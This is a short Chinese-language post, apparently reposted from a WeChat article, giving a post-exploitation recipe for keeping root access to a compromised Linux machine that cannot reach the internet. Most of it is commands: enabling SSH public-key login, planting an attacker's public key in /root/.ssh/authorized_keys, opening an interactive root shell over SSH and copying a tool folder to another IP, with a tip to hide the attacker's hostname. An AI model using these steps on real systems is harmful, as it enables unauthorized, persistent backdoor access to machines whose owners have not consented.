以前的老东西,拿出水一篇 一般是通过 Rce,提权等等情况,拿到目标 linux 的 root 权限 主要是没有密码, hash 跑不出来,机器无法正常出网 就可以去试着正向链接
启用ssh证书登录,并重启SSH 服务
echo RSAAuthentication yes >> /etc/ssh/sshd_configecho PubkeyAuthentication yes >> /etc/ssh/sshd_configsystemctl restart sshd
# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa注意:这一步最好去一个纯净的Linux生成,因为这个key会暴露你的主机名
//找见id_rsa.pub自行拷贝出来ls -al /root/.ssh/cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop///赋于权限chmod 777 /home/xxxx/Desktop/id_rsa.pub
id_rsa(私钥)id_rsa.pub(公钥)
自行上传公钥到内网linux,并将其保存到/root/.ssh/目录下,文件名改为authorized_keys,或者命令执行用echo追加
如目标已事先存在authorized_keys文件,直接往最后追加即可
注意:再操作之前要对原authorized_keys进行“备份”,以备不时之需。
# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keysssh -T root@192.168.1.1 /usr/bin/bash -iscp -P 22 -r /root/fsacn [email protected]211.55.11:/usr/tmp/fsacn
文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NzY5MzI5Ng==&mid=2247494391&idx=1&sn=124fbb5770f335c7788d6dd80332f128&chksm=fc9bf068cbec797e6477d24e6fb3a6e2e9e1d03dcc6191e07b58066cc991eabd34b6183fd13e#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh